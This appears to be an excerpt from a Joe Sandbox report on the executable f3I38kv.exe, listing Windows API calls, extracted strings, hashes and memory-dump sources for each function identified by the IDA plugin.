                                                            • Opcode ID: 55dd17cb06a14c22918e94c35d3f404f65cf9481e7b084aa5a6a824e53dc0bcf
                                                            • Instruction ID: 8bcea308c5580d035a632e24eeab5db6f998e2d6629e62d1d882cc8d2d98b56b
                                                            • Opcode Fuzzy Hash: 55dd17cb06a14c22918e94c35d3f404f65cf9481e7b084aa5a6a824e53dc0bcf
                                                            • Instruction Fuzzy Hash: 0D01B533284314BAD2114FA8AD0DF6F7F6DBB6AB42F110511F705A20E0C6A39908A775
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00517E24,00000000,?,00517DC4,00000000,0052C300,0000000C,00517F1B,00000000,00000002), ref: 00517E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00517EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00517E24,00000000,?,00517DC4,00000000,0052C300,0000000C,00517F1B,00000000,00000002), ref: 00517EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 96982dd64f122a7a16279fd0c9b25b8f50019253b15e14490feea8b8df904922
                                                            • Instruction ID: e2148e50200fccbce000e25482459fb23dc28669470f6d557b32fde95e48cd1d
                                                            • Opcode Fuzzy Hash: 96982dd64f122a7a16279fd0c9b25b8f50019253b15e14490feea8b8df904922
                                                            • Instruction Fuzzy Hash: 66F04435900218FBDB219BA4DC49BDEBFB8FF49711F0041A9F805A22A0DB759E45DA90
                                                            APIs
                                                              • Part of subcall function 0050081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00500836
                                                              • Part of subcall function 0050081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004FF2D8,Crypt32.dll,00000000,004FF35C,?,?,004FF33E,?,?,?), ref: 00500858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004FF2E4
                                                            • GetProcAddress.KERNEL32(005381C8,CryptUnprotectMemory), ref: 004FF2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 4638b18e58dbffd6b64deefdc06322b13adf70bdcd762ec6da72eaa81481cf05
                                                            • Instruction ID: af573943cc8ac5e08773881eb7be4fe0ba9ec219698fd95afdf3bf2a9dcb19f2
                                                            • Opcode Fuzzy Hash: 4638b18e58dbffd6b64deefdc06322b13adf70bdcd762ec6da72eaa81481cf05
                                                            • Instruction Fuzzy Hash: 89E04F709107169EC7309B34A88DB567ED47F16B04F14886EE4DA936C0EBBDD5458B50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: 8b6ea8c6941308c2d45d86872e1abd6b92c649509319369c0056c4743f40cc7b
                                                            • Instruction ID: de042f2e3a871ef64ae3f0776cf1d5a52a86f870e551c4a1427fbb9eb8697699
                                                            • Opcode Fuzzy Hash: 8b6ea8c6941308c2d45d86872e1abd6b92c649509319369c0056c4743f40cc7b
                                                            • Instruction Fuzzy Hash: 6F51D0B1600216AFFB288F14E849BEA7FA4FF54314F24452DE901476A1E731EDE1D790
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0051BF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0051BF5C
                                                              • Part of subcall function 00518E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0051CA2C,00000000,?,00516CBE,?,00000008,?,005191E0,?,?,?), ref: 00518E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0051BF82
                                                            • _free.LIBCMT ref: 0051BF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0051BFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: de17d7f4d4d6c94dd06ccd95d674f2a024262dae18f463e7aade752b122b1ab9
                                                            • Instruction ID: fa79a6ba5e71b984b09d4bc43f561999249e43730534c92abb9e8d0fbc9a2517
                                                            • Opcode Fuzzy Hash: de17d7f4d4d6c94dd06ccd95d674f2a024262dae18f463e7aade752b122b1ab9
                                                            • Instruction Fuzzy Hash: 7E015E666056157F332116765C8DCBB6F6DFEC6BA13140129B904C2141EB648D43E5B0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,005191AD,0051B188,?,00519813,00000001,00000364,?,00513F73,00000050,?,00531030,00000200), ref: 0051986E
                                                            • _free.LIBCMT ref: 005198A3
                                                            • _free.LIBCMT ref: 005198CA
                                                            • SetLastError.KERNEL32(00000000,?,00531030,00000200), ref: 005198D7
                                                            • SetLastError.KERNEL32(00000000,?,00531030,00000200), ref: 005198E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: ce31c8d42b611389d5c66386f4cec4fa4924ad10264a257d5730914841ed5336
                                                            • Instruction ID: 12c21cabf96b2114f6e176f37aea2fdbc7654302f90b1cb15f3068506eed6981
                                                            • Opcode Fuzzy Hash: ce31c8d42b611389d5c66386f4cec4fa4924ad10264a257d5730914841ed5336
                                                            • Instruction Fuzzy Hash: 2601D13A2447027BF32222246CAD9EA2D69FFE3771B250539F50592192FF248C8A6221
                                                            APIs
                                                              • Part of subcall function 005011CF: ResetEvent.KERNEL32(?), ref: 005011E1
                                                              • Part of subcall function 005011CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 005011F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00500F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 00500F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00500F54
                                                            • CloseHandle.KERNEL32(?), ref: 00500F60
                                                            • CloseHandle.KERNEL32(?), ref: 00500F6C
                                                              • Part of subcall function 00500FE4: WaitForSingleObject.KERNEL32(?,000000FF,00501206,?), ref: 00500FEA
                                                              • Part of subcall function 00500FE4: GetLastError.KERNEL32(?), ref: 00500FF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: ff7b63a9813ceb753f2ff81cc31509c1d91ca22d5efabe50c810a92a702601e5
                                                            • Instruction ID: cac2e0fd42887ec5212c2c299f8599d6c8b80c63e978005706a7dd09f1d6ba5d
                                                            • Opcode Fuzzy Hash: ff7b63a9813ceb753f2ff81cc31509c1d91ca22d5efabe50c810a92a702601e5
                                                            • Instruction Fuzzy Hash: A4015276100745EFC7329B64DC88BCABBA9FF09710F000929F15B521A0CB757A49DA64
                                                            APIs
                                                            • _free.LIBCMT ref: 0051C817
                                                              • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?), ref: 00518DE2
                                                              • Part of subcall function 00518DCC: GetLastError.KERNEL32(?,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?,?), ref: 00518DF4
                                                            • _free.LIBCMT ref: 0051C829
                                                            • _free.LIBCMT ref: 0051C83B
                                                            • _free.LIBCMT ref: 0051C84D
                                                            • _free.LIBCMT ref: 0051C85F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 3690f7740f8d75714c8ab2c2893f2012e6ae862f0d47f1391d022da8fd08d360
                                                            • Instruction ID: d2aa25fcaaf59151ae5bcb3d76c765ea6e54fd02fd9499ec58f87ab9aa69deb2
                                                            • Opcode Fuzzy Hash: 3690f7740f8d75714c8ab2c2893f2012e6ae862f0d47f1391d022da8fd08d360
                                                            • Instruction Fuzzy Hash: 35F01432540211ABA630AA68F8CACAA7FEDBF50B107650C19F108D7652CB71FCC0CA60
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00501FE5
                                                            • _wcslen.LIBCMT ref: 00501FF6
                                                            • _wcslen.LIBCMT ref: 00502006
                                                            • _wcslen.LIBCMT ref: 00502014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,004FB371,?,?,00000000,?,?,?), ref: 0050202F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: 5fd071b6f0a2431837abc0493520dd1695d1eb2254d5f9fe5f1e29718fb161cd
                                                            • Instruction ID: dc8ff83925d23af7ea5180ecd34eab6dda41c57ec558f4d5f0947bc5bdf820b5
                                                            • Opcode Fuzzy Hash: 5fd071b6f0a2431837abc0493520dd1695d1eb2254d5f9fe5f1e29718fb161cd
                                                            • Instruction Fuzzy Hash: DFF06D32008214BBDF221F51EC0DDCE3F2AFB80760F118405F61A5E0A1CB7296A1D690
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: 7894b72168f005eb507bbd3338f94e1bbb268c1a533560dfacce197f3ea0c9da
                                                            • Instruction ID: 89aadf003eec336cd2eaa2fe8cca42acfba269f6def2f3904205cbef9cc7af54
                                                            • Opcode Fuzzy Hash: 7894b72168f005eb507bbd3338f94e1bbb268c1a533560dfacce197f3ea0c9da
                                                            • Instruction Fuzzy Hash: AB51C735288F04F6F7211A908E46F3E7E65BF15B04F248D06F387648E2D9A7A5506B1F
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\f3I38kv.exe,00000104), ref: 00517FAE
                                                            • _free.LIBCMT ref: 00518079
                                                            • _free.LIBCMT ref: 00518083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\f3I38kv.exe
                                                            • API String ID: 2506810119-3643475460
                                                            • Opcode ID: dfb51ebd140d3f92907dd38e79fabb47ab25136622415db313361d737d6f4fc8
                                                            • Instruction ID: ab98caafe361c1f6b122cbbc1ad85b1cd8a27725cf76b1eead91f036f95eba0a
                                                            • Opcode Fuzzy Hash: dfb51ebd140d3f92907dd38e79fabb47ab25136622415db313361d737d6f4fc8
                                                            • Instruction Fuzzy Hash: E6318071A0021DAFEB21DF99D888DEEBFB8FB99310F104066F80497211DB718A89DB51
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005131FB
                                                            • _abort.LIBCMT ref: 00513306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: 2f2bcd6d75f1967af082b14dac1dd4ed3b1b4902f9513178159c06be971677a7
                                                            • Instruction ID: c9ac8ca6e3a172d8dbce7486bbcc14d48882cc6406f41e494dc074ae95da71c9
                                                            • Opcode Fuzzy Hash: 2f2bcd6d75f1967af082b14dac1dd4ed3b1b4902f9513178159c06be971677a7
                                                            • Instruction Fuzzy Hash: F3416875900209AFEF15DF98CC81AEEBFB5BF48304F188099F914A7251D335EAA0DB54
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F7406
                                                              • Part of subcall function 004F3BBA: __EH_prolog.LIBCMT ref: 004F3BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004F74CD
                                                              • Part of subcall function 004F7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 004F7AAB
                                                              • Part of subcall function 004F7A9C: GetLastError.KERNEL32 ref: 004F7AF1
                                                              • Part of subcall function 004F7A9C: CloseHandle.KERNEL32(?), ref: 004F7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: 57cb990a5e563c84a2e9d802a57e2334476d7d0c43f353fd20e1bb244bc14943
                                                            • Instruction ID: a134b083ec6a5acf6764a36f9bd855a9eb18b40a1cbbbeb03161de0208900473
                                                            • Opcode Fuzzy Hash: 57cb990a5e563c84a2e9d802a57e2334476d7d0c43f353fd20e1bb244bc14943
                                                            • Instruction Fuzzy Hash: 9831EE71D0025DAADF11ABA4DC49BFF7BA8AF19304F04401AF604A7292D77C9A488B68
                                                            APIs
                                                              • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                                              • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                                            • EndDialog.USER32(?,00000001), ref: 0050AD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0050ADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0050ADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: facfba8125f6d54fae118729e48e28aefd62855a1196d55c6c23ea94b9f213f9
                                                            • Instruction ID: d661e9c7549c0630fbc2aa77c456fea1f70b1f3a2b8de69df909d09593007dd7
                                                            • Opcode Fuzzy Hash: facfba8125f6d54fae118729e48e28aefd62855a1196d55c6c23ea94b9f213f9
                                                            • Instruction Fuzzy Hash: 8211BE33240710AFE3118F68AD49FAE3F69FB5A743F400411F241EA4F0C7629D09A72A
                                                            APIs
                                                            • DialogBoxParamW.USER32(GETPASSWORD1,00010424,0050B270,?,?), ref: 0050DE18
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: DialogParam
                                                            • String ID: GETPASSWORD1$rP$xzT
                                                            • API String ID: 665744214-3788108970
                                                            • Opcode ID: 8d0c70e50cda36167564ff8326cc3bb02f368b4f64561e239e2cb8af2df9eefc
                                                            • Instruction ID: a627da64993afd1b4e3043224b819cb1130881858be59ba2c8a1c2ffece0e2cf
                                                            • Opcode Fuzzy Hash: 8d0c70e50cda36167564ff8326cc3bb02f368b4f64561e239e2cb8af2df9eefc
                                                            • Instruction Fuzzy Hash: 92113832600248AADF119A34EC05BBF3FA8BB1A355F144465BD49EB1C0C7B4AC88D374
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 004FD954
                                                            • _strncpy.LIBCMT ref: 004FD99A
                                                              • Part of subcall function 00501DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00531030,00000200,004FD928,00000000,?,00000050,00531030), ref: 00501DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: 7a39a2fa5daa9a24aa8965a97c86974a3c13ed9cbadce85c751d43fe859d07de
                                                            • Instruction ID: 2184c4296db374c82f51f59f3d6e61c3a92dbc3dfe08b9227d06edcd99901681
                                                            • Opcode Fuzzy Hash: 7a39a2fa5daa9a24aa8965a97c86974a3c13ed9cbadce85c751d43fe859d07de
                                                            • Instruction Fuzzy Hash: 7921967284024CAADB21DFA4CC05FEF7BE9AF06704F044423FA1096192E376D645CB56
                                                            APIs
